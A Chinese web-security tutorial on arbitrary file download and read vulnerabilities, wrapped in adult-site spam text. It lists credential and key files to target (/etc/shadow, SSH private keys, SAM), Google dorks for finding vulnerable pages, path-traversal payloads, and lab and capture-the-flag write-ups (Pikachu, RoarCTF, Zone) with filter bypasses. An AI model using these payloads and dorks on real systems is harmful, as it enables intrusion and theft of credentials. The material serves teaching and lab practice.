婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 案例講解WEB 漏洞-文件操作之文件下載讀取

案例講解WEB 漏洞-文件操作之文件下載讀取

熱門標簽:不同的地圖標注 激戰黃昏地圖標注說明 交行外呼系統有哪些 防城港市ai電銷機器人 怎么更改地圖標注電話 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 臨滄移動外呼系統哪家有 隨州銷售外呼系統平臺

原理

產生:任意語言代碼下載函數
文件下載(一些網站由于業務需求,往往需要提供文件查看或文件下載功能,但若對用戶查看或下載的文件不做限制,則惡意用戶就能夠查看或下載任意敏感文件,這就是文件查看與下載漏洞。)

文件下載功能在很多web系統上都會出現,一般我們當點擊下載鏈接,便會向后臺發送一個下載請求,一般這個請求會包含一個需要下載的文件名稱,后臺在收到請求后 會開始執行下載代碼,將該文件名對應的文件response給瀏覽器,從而完成下載。 如果后臺在收到請求的文件名后,將其直接拼進下載文件的路徑中而不對其進行安全判斷的話,則可能會引發不安全的文件下載漏洞。此時如果 攻擊者提交的不是一個程序預期的的文件名,而是一個精心構造的路徑(比如../../../etc/passwd),則很有可能會直接將該指定的文件下載下來。 從而導致后臺敏感信息(密碼文件、源代碼等)被下載。
所以,在設計文件下載功能時,如果下載的目標文件是由前端傳進來的,則一定要對傳進來的文件進行安全考慮。

漏洞危害

下載服務器任意文件,如腳本代碼、服務及系統配置文件等
可用得到的代碼進一步代碼審計,得到更多可利用漏洞

利用方式

淺談任意文件下載漏洞的利用
信息收集信息→猜路徑→下載配置文件/代碼文件→利用服務器軟件漏洞→shell→提權

首先收集系統信息,包括系統版本,中間件,cms版本,服務器用途,服務器使用者信息,端口,web路徑等,然后根據收集到的信息,下載配置文件,如weblogic,ftp,ssh等, 根據下載到的配置文件進行滲透。

1. 讀取程序源代碼(如密碼配置文件)
2. 讀取程序配置文件(如數據庫連接文件)
如weblogic,ssh,ftp,數據庫配置文件等, 當解出密碼后,進行登陸,getshell
3. 讀取操作系統關鍵文件(如/etc/sadow,/ root/.bash_history等文件)
4. 讀取運維配置文件(redis/rsync/ftp/ssh客 戶端數據等)
5. 讀取中間件配置文件(weblogic/tomcat等 密碼文件,apache的httpd.conf文件)
6. 下載web日志文件(獲取網站后臺/上傳文件 等)
 下載日志文件,找到登錄/上傳/后臺/ 操作,找到登錄入口 可以爆破,測試默認口令,弱口令,  找到文件上傳點則測試文件上傳漏洞,找到后臺操作試試有沒有未授權訪問
7. 結合SSRF獲取內網機器文件
8. 可以利用../返回到上級目錄下載敏感文件

系統文件

window

C:\boot.ini //查看系統版本
C:\Windows\System32\inetsrv\MetaBase. xml //IIS配置文件
C:\Windows\repair\sam //存儲系統初次安裝的密碼
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user. MYD  //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息

Linux

.bash_history` # 歷史中可能帶著用戶的密碼 ( 遇到過現實案例,是輸錯的情況下參數的,比如沒 輸入 su 卻以為自己輸了 su)
/etc/passwd # 用戶情況
/etc/shadow # 直接 John the Ripper
/etc/hosts # 主機信息,通常配置了一些內網 域名
/root/.bash_history //root的bash歷史記錄
/root/.ssh/authorized_keys /root/.mysql_history //mysql的bash歷史記錄
/root/.wget-hsts /opt/nginx/conf/nginx.conf //nginx的配置文件
/var/www/html/index.html /etc/my.cnf /etc/httpd/conf/httpd.conf //httpd的配置文件
/proc/self/fd/fd[0-9]*(文件標識符)
/proc/mounts /porc/config.gz /proc/sched_debug // 提供cpu上正在運行的進程信息,可以獲得進程的pid號,可以配合后面需要pid的利用
/proc/mounts // 掛載的文件系統列表
/proc/net/arp //arp表,可以獲得內網其他機器的地址
/proc/net/route //路由表信息
/proc/net/tcp and /proc/net/udp // 活動連接的信息
/proc/net/fib_trie // 路由緩存
/proc/version // 內核版本
/proc/[PID]/cmdline // 可能包含有用的路徑信息
/proc/[PID]/environ // 程序運行的環境變量信息,可以用來包含getshell
/proc/[PID]/cwd // 當前進程的工作目錄
/proc/[PID]/fd/[#] // 訪問file descriptors, 某寫情況可以讀取到進程正在使用的文件,比如 access.log /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys /etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/syscomfig/network-scripts/ifcfg-eth1
/usr/local/tomcat/conf/tomcat-users. xml # tomcat 用戶配置文件
/root/.bashrc # 環境變量
/root/.bash_history # 還有root外的其他用戶
/root/.viminfo # vim 信息
/root/.ssh/id_rsa # 拿私鑰直接ssh
/proc/xxxx/cmdline # 進程狀態枚舉 xxxx 可以為0000-9999 使用burpsuite 數據庫 config 文件     web 日志 access.log, error.log /var/lib/php/sess_PHPSESSID # 非常規問題 session 文件
/proc/net/arp /proc/net/tcp /proc/net/udp /proc/net/dev

常見腳本敏感文件參考

PHP: inc/config. php獲得數據庫連接字符串中的口令信息
asp: inc/conn.asp文件,獲得數據庫連接字符串,得到數據庫口令。
aspx: web.config網站根目錄文件,獲得數據庫連接信息。
JSP: conf/ tomcat-user.xml文件,獲得tomcat管理界面的口令信息
WEB- INF /Web. xml文件,獲得數據庫連接字符串中的口令信息。

任意文件讀取

?php
    $filename = "test.txt";
    readfile($filename);
?>

?php
    $filename = "test.txt";
    $fp = fopen($filename,"r") or die("Unable to open file!");
    $data = fread($fp,filesize($filename));
    fclose($fp);
    echo $data;
?>

?php
    $filename = "test.txt";
    echo file_get_contents($filename);
?>

任意文件下載

直接下載:

a  rel="external nofollow" >Download/a>

用header()下載:

?php
    $filename = "uploads/201607141437284653.jpg";
    header('Content-Type: imgage/jpeg');
    header('Content-Disposition: attachment; filename='.$filename);
    header('Content-Lengh: '.filesize($filename));
?>

Google search

inurl:"readfile.php?file="
inurl:"read.php?filename="
inurl:"download.php?file="
inurl:"down.php?file="
等等...

漏洞利用代碼

readfile.php?file=/etc/passwd
readfile.php?file=../../../../../../../../etc/passwd
readfile.php?file=../../../../../../../../etc/passwd%00

1.文件被解析,則是文件包含漏洞
2.顯示源代碼,則是文件讀取漏洞
3.提示文件下載,則是文件下載漏洞

漏洞挖掘

可以用Google hacking或Web漏洞掃描器
從鏈接上看,形如:
    • readfile.php?file=***.txt
    • download.php?file=***.rar
從參數名看,形如:
    • RealPath= 
    • FilePath= 
    • filepath= 
    • Path= 
    • path= 
    • inputFile= 
    • url= 
    • urls= 
    • Lang= 
    • dis= 
    • data= 
    • readfile= 
    • filep= 
    • src= 
    • menu= 
    • META-INF 
    • WEB-INF
目錄符號等
../ ..\ .\ ./等
%00 ? %23 %20 .等

漏洞驗證

• index.php?f=../../../../../../etc/passwd 
• index.php?f=../index.php 
• index.php?f=file:///etc/passwd
注:當參數f的參數值為php文件時,若是文件被解析則是文件包含漏洞,
    若顯示源碼或提示下載則是文件查看與下載漏洞

漏洞防范

任意文件下載漏洞的簡單防護措施
1、過濾“.”符號,使用戶在url中無法回溯到上級目錄。
2、使用正則表達式嚴格判斷用戶輸入參數的格式。
3、php.ini配置文件中對于open_basedir進行配置,限定用戶的文件訪問范圍。
4、固定目錄

案例

pikuchu靶場-文件下載測試

1、判斷是否為文件上傳漏洞


點擊任意圖片,發現下載了圖片,復制圖片下載鏈接查看

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=kb.png

查看參數名為filename,查看參數后面的值也與下載的文件名一樣
初步判定為文件上傳漏洞

2、判斷下載路徑
filename的文件名是單純的文件名,可判斷是前面加了路徑名,也可能是與網站在同一個目錄下
通過URL判斷文件是通過跳轉到execdownload.php頁面下載的,我們試試看可不可以直接下載到execdownload.php這個源碼

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=execdownload.php

發現顯示無法下載,說明該execdownload.php與文件不在同一個路徑下,我們嘗試下到上一級路徑

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=../execdownload.php


成功下載,打開源碼發現是在download文件夾下


說明文件下載路徑的文件夾與down_nba.php是同一級路徑
3、嘗試下載敏感文件(以下路徑均通過掃描路徑得到)
pikachu-master/inc/config.inc.php
當前下載路徑:
pikachu-master/vul/unsafedownload/download/xxx.xxx
與vul相差3個父目錄,所以加3個…/
完整url:
http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=…/…/…/inc/config.inc.php
下載成功,打開發現里面存在數據庫相關的配置文件

小米路由器-文件讀取真實測試-漏洞

復現

RoarCTF2019-文件讀取真題復現

wp
首先看到一個頁面,點擊下help看看啥情況。

發現輸出一串

java.io.FileNotFoundException:{help.docx}

是文件無法找到的異常信息

查詢資料發現:
WEB-INF/web.xml泄露
WEB-INF是Java的WEB應用的安全目錄。如果想在頁面中直接訪問其中的文件,必須通過web.xml文件對要訪問的文件進行相應映射才能訪問。WEB-INF主要包含一下文件或目錄:
/WEB-INF/web.xml:Web應用程序配置文件,描述了 servlet 和其他的應用組件配置及命名規則。
/WEB-INF/classes/:含了站點所有用的 class 文件,包括 servlet class 和非servlet class,他們不能包含在 .jar文件中
/WEB-INF/lib/:存放web應用需要的各種JAR文件,放置僅在這個應用中要求使用的jar文件,如數據庫驅動jar文件
/WEB-INF/src/:源碼目錄,按照包名結構放置各個java文件。
/WEB-INF/database.properties:數據庫配置文件

漏洞成因:
通常一些web應用我們會使用多個web服務器搭配使用,解決其中的一個web服務器的性能缺陷以及做均衡負載的優點和完成一些分層結構的安全策略等。在使用這種架構的時候,由于對靜態資源的目錄或文件的映射配置不當,可能會引發一些的安全問題,導致web.xml等文件能夠被讀取。漏洞檢測以及利用方法:通過找到web.xml文件,推斷class文件的路徑,最后直接class文件,在通過反編譯class文件,得到網站源碼。一般情況,jsp引擎默認都是禁止訪問WEB-INF目錄的,Nginx 配合Tomcat做均衡負載或集群等情況時,問題原因其實很簡單,Nginx不會去考慮配置其他類型引擎(Nginx不是jsp引擎)導致的安全問題而引入到自身的安全規范中來(這樣耦合性太高了),修改Nginx配置文件禁止訪問WEB-INF目錄就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!

根據上文,我們先找一下WEB-INF/web.xml,POST傳值

得到WEB-INF/web.xml文件,打開

?xml version="1.0" encoding="UTF-8"?>
web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    welcome-file-list>
        welcome-file>Index/welcome-file>
    /welcome-file-list>

    servlet>
        servlet-name>IndexController/servlet-name>
        servlet-class>com.wm.ctf.IndexController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>IndexController/servlet-name>
        url-pattern>/Index/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>LoginController/servlet-name>
        servlet-class>com.wm.ctf.LoginController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>LoginController/servlet-name>
        url-pattern>/Login/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>DownloadController/servlet-name>
        servlet-class>com.wm.ctf.DownloadController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>DownloadController/servlet-name>
        url-pattern>/Download/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>FlagController/servlet-name>
        servlet-class>com.wm.ctf.FlagController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>FlagController/servlet-name>
        url-pattern>/Flag/url-pattern>
    /servlet-mapping>

/web-app>

我們可以看到com.wm.FlagController,

    servlet>
        servlet-name>FlagController/servlet-name>
        servlet-class>com.wm.ctf.FlagController/servlet-class>
    /servlet>

servlet-class里面的.代表的是路徑/
然后下載FlagController.class文件試一試

filename=WEB-INF/classes/com/wm/ctf/FlagController.class

打開文件發現一串base編碼,進行base64解密得到flag


資料1
資料2

百度杯2017二月-Zone真題復現

靶場
wp1
wp2

1、 嘗試burp抓包發現cookie中有個login,值為0,將0改為1后在訪問首頁,發現可以正常登入


2、單擊 “manage” (此時還是需要用burp改login的值),點擊框框發現比較特殊的url;猜測可能存在文件包含或者下載、讀取

3、測試訪問url: xxxxxx.com/manages/admin.php?module=ind…/exname=php 頁面可以正常訪問,猜測過濾了一遍…/再試一試繞過 url:url: xxxxxx.com/manages/admin.php?module=ind…/./exname=php 訪問不正常;
說明過濾機制只是把…/進行了一次過濾,所以我們雙寫…/即可

4、訪問測試任意文件讀取判斷路徑通過不斷加…/ url:?module=…/./…/./…/./etc/passwdname
(用戶情況文件)

5、查看下服務器是nginx。找一下它的配置文件,根據信息讀取配置文件, url: manages/admin.php?module=…/./…/./…/./etc/nginx/nginx.conf 獲得關鍵文件sites-enabled/default 并進行讀取


module=…/./…/./…/./etc/nginx/sites-enabled/defaultname=獲得web文件路徑online-movies 并訪問


6、發現可以利用的漏洞,因為有一個autoindex on也就是開啟了目錄遍歷,我們可以訪問這個/online-movies/,訪問出現如下,再點擊…/發現要進行驗證,把login改為1后頁面空白,我通過百度發現要/online-movies/…才能遍歷(不清楚為什么)


7、訪問/online-movies…/

8、地址為:online-movies…/var/www/html/flag.php構造url下載到flag.php獲得flag

到此這篇關于案例講解WEB 漏洞-文件操作之文件下載讀取的文章就介紹到這了,更多相關WEB 漏洞文件下載讀取內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Python腳本實現Web漏洞掃描工具

標簽:阜陽 河源 紅河 哈密 忻州 青海 沈陽 無錫

巨人網絡通訊聲明:本文標題《案例講解WEB 漏洞-文件操作之文件下載讀取》,本文關鍵詞  案例,講解,WEB,漏洞,文件,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《案例講解WEB 漏洞-文件操作之文件下載讀取》相關的同類信息!
  • 本頁收集關于案例講解WEB 漏洞-文件操作之文件下載讀取的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    日韩国产精品91| 欧美日韩日日夜夜| 99久久婷婷国产| 精品乱码亚洲一区二区不卡| 日韩精品国产欧美| 欧美精品日韩综合在线| 丝瓜av网站精品一区二区 | 亚洲欧美日韩国产手机在线| 国产成人av影院| 亚洲欧美一区二区视频| 色综合中文字幕| 亚洲丶国产丶欧美一区二区三区| 精品视频在线看| 国产精品一二一区| 一区二区三区欧美日韩| 7777精品久久久大香线蕉| 精品一区二区三区在线播放 | 日韩免费观看高清完整版 | 久久国产福利国产秒拍| 日本一区二区三区视频视频| 99精品一区二区三区| 亚洲国产婷婷综合在线精品| 91精品国产综合久久婷婷香蕉| 加勒比av一区二区| 成人欧美一区二区三区白人| 欧美日韩国产首页在线观看| 国产精品一区二区在线观看网站| 国产精品欧美综合在线| 69久久夜色精品国产69蝌蚪网| 国内一区二区在线| 亚洲综合激情小说| 国产亚洲综合av| 7777精品伊人久久久大香线蕉的| 粉嫩在线一区二区三区视频| 亚洲成人精品在线观看| 中文字幕av一区二区三区| 91精品午夜视频| 欧洲一区二区三区免费视频| 国产精一区二区三区| 亚洲成a人在线观看| 中文字幕欧美日韩一区| 欧美一区二区三区免费观看视频 | 国产高清久久久| 亚洲综合一区二区三区| 26uuu精品一区二区| 欧洲精品一区二区| 成人国产亚洲欧美成人综合网| 日本视频中文字幕一区二区三区| 日本一区二区在线不卡| 2017欧美狠狠色| 欧美视频完全免费看| 国产九色精品成人porny | 免费久久精品视频| 日韩一区在线免费观看| 久久久噜噜噜久久人人看| 精品久久久网站| 日韩免费高清av| 91蜜桃网址入口| 99久久精品免费精品国产| 国产成人免费在线视频| 麻豆91免费看| 日韩精品亚洲专区| 日韩激情中文字幕| 一区二区三区中文在线观看| 亚洲人妖av一区二区| 亚洲欧洲av色图| 亚洲色图一区二区| 亚洲欧美另类久久久精品2019| 国产精品免费视频网站| 国产精品久久国产精麻豆99网站 | 成人免费观看视频| 粉嫩aⅴ一区二区三区四区| 国产成人在线电影| 99久久综合精品| 日本韩国欧美一区二区三区| 欧洲精品中文字幕| 91精品国产入口在线| 欧美v国产在线一区二区三区| 欧美白人最猛性xxxxx69交| 久久久不卡网国产精品二区| 亚洲国产精品成人综合色在线婷婷 | 欧美三级日韩三级国产三级| 欧美性大战久久久久久久蜜臀| 欧美日韩一区二区三区四区五区| 日韩欧美在线一区二区三区| 久久视频一区二区| 亚洲天堂久久久久久久| 手机精品视频在线观看| 九九国产精品视频| 不卡av免费在线观看| 欧美视频中文字幕| 久久亚洲精华国产精华液| 亚洲欧美日韩中文字幕一区二区三区| 性做久久久久久免费观看| 国内成+人亚洲+欧美+综合在线 | 中文字幕av一区 二区| 亚洲欧美二区三区| 久久99久久99| 一本色道久久综合亚洲精品按摩| 这里只有精品免费| 国产精品乱码久久久久久| 亚洲国产精品一区二区www在线| 国产乱淫av一区二区三区 | 精品福利一区二区三区免费视频| 中文字幕欧美国产| 日韩成人伦理电影在线观看| 99久久er热在这里只有精品66| 欧美一级国产精品| 亚洲综合一区二区| 成人少妇影院yyyy| 日韩精品一区二区三区四区| 成人欧美一区二区三区白人| 国模套图日韩精品一区二区| 欧美日韩一区三区四区| 国产精品美女久久久久高潮| 天天影视涩香欲综合网| 91麻豆国产福利在线观看| 精品久久久久久久人人人人传媒 | 欧美一区二区三区在| 亚洲人妖av一区二区| 岛国一区二区三区| 久久在线观看免费| 免费成人在线影院| 欧美日韩精品一区二区在线播放| 国产精品理伦片| 国产成人精品一区二| 欧美大片免费久久精品三p| 偷拍一区二区三区| 欧美日韩中字一区| 亚洲成人精品一区二区| 欧美午夜精品久久久久久孕妇| 最新国产成人在线观看| 国产福利91精品一区二区三区| 久久综合久久鬼色中文字| 美女网站在线免费欧美精品| 91精品国产综合久久精品app| 亚洲va欧美va国产va天堂影院| 欧美日韩国产片| 日韩电影免费一区| 欧美tk丨vk视频| 国产乱码精品一区二区三区五月婷| 久久夜色精品一区| 成人久久18免费网站麻豆| 亚洲国产精品黑人久久久| 成人av网站免费| 一区二区三区电影在线播| 欧美色视频一区| 免费看日韩a级影片| 久久综合丝袜日本网| 成人午夜免费电影| 亚洲裸体xxx| 欧美精品电影在线播放| 青青草原综合久久大伊人精品| 精品日韩欧美一区二区| 国产一区二区伦理| 国产亚洲人成网站| 91在线视频免费观看| 亚洲电影在线播放| 欧美v亚洲v综合ⅴ国产v| 国产91丝袜在线观看| 一区二区三区在线视频播放 | 国产人成一区二区三区影院| 99久久精品情趣| 日韩高清在线观看| 国产视频在线观看一区二区三区| 99久久综合国产精品| 亚洲国产成人tv| www久久精品| 色999日韩国产欧美一区二区| 日本美女一区二区| 国产精品欧美一级免费| 精品视频一区二区三区免费| 久久99精品国产| 亚洲午夜影视影院在线观看| 精品国产自在久精品国产| 色偷偷成人一区二区三区91| 久久国产综合精品| 亚洲天堂成人在线观看| 9191国产精品| 99久久伊人精品| 美女国产一区二区| 亚洲乱码中文字幕| 久久美女高清视频| 欧美日韩国产综合一区二区三区 | 中文久久乱码一区二区| 欧美精品aⅴ在线视频| 成人福利在线看| 日韩黄色一级片| 一区二区三区国产| 成人免费一区二区三区视频| 久久网站热最新地址| 日韩一区二区三区电影| 99视频热这里只有精品免费| 国产精品一区二区你懂的| 日本不卡视频一二三区| 亚洲综合在线第一页| 欧美精彩视频一区二区三区| 欧美一区二区三区四区在线观看| 97se亚洲国产综合自在线不卡 | 午夜精品在线看|